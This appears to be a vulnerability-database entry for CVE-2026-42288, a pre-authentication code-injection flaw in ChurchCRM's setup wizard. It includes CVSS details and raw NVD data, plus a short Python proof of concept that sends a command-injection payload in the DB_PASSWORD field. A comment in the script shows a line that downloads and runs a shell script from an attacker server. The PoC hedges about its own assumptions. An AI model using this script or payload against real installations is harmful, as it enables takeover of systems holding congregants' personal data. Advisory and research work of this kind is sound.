Security Vulnerability Report
中文
CVE-2026-42288 CVSS 10.0 CRITICAL

CVE-2026-42288

Published: 2026-05-12 23:16:18
Last Modified: 2026-05-13 16:10:58

Description

ChurchCRM is an open-source church management system. Prior to 7.3.2, The fix for CVE-2026-39337 is incomplete. The pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard via unsanitized DB_PASSWORD remains fully exploitable This vulnerability is fixed in 7.3.2.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ChurchCRM < 7.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the ChurchCRM setup wizard target_url = "http://target-ip/setup.php" # The vulnerability exists in the DB_PASSWORD parameter during setup. # Since the input is unsanitized, we can inject a payload to achieve RCE. # This example assumes a command injection context or a similar eval-based execution. # Payload example: `; curl http://attacker-server/shell.sh | bash` malicious_payload = "; id;" data = { "DB_HOST": "localhost", "DB_USER": "root", "DB_NAME": "churchcrm", "DB_PASSWORD": malicious_payload, "Step": "3" # Assuming the vulnerable step in the wizard } try: response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check for code execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42288", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:17.600", "lastModified": "2026-05-13T16:10:57.817", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.3.2, The fix for CVE-2026-39337 is incomplete. The pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard via unsanitized DB_PASSWORD remains fully exploitable This vulnerability is fixed in 7.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-mp2w-4q3r-ppx7", "source": "[email protected]"}]}}